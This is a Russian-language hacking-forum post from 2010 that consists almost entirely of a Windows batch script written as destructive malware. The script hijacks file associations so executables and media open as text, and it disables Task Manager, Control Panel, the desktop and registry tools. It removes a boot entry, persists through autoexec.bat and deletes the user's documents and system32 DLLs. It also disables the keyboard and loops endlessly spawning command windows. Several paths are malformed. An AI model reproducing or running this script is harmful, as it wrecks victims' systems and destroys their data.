Показать сообщение отдельно

  #3  
Старый 23.02.2010, 20:02
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Код:
echo off 
assoc .exe=.txt 
assoc .mp3=.txt 
assoc .avi=.txt 
assoc .wav=.txt 
assoc .jpg=.txt 
assoc .bmp=.txt 
assoc .rar=.txt 
assoc .zip=.txt 
assoc .dll=.txt 
assoc .ink=.txt 
assoc .drv=.txt 
assoc .mpg=.txt 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul 
bootcfg /delete /id 1 >nul 
taskkill /f /im explorer.exe >nul 
copy %0 c:str.bat >nul 
echo c:str.bat>>c:autoexec.bat 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul 
del C:windowsMedia /q 
:x 
 Start cmd 
 goto x
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul 
Chcp 1251
del "%USERPROFILE%Мои документы*.*" /q /s 
Chcp 1251
label C: LAMER
del "%SystemRoot%system32*.dll" /q >nul 
rundll32 keyboard,disable 
del %SystemRoot%\system32\devmgmt.msc >nul  
reg add HKCU\SoftwareMicrosoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
=)]
 
Ответить с цитированием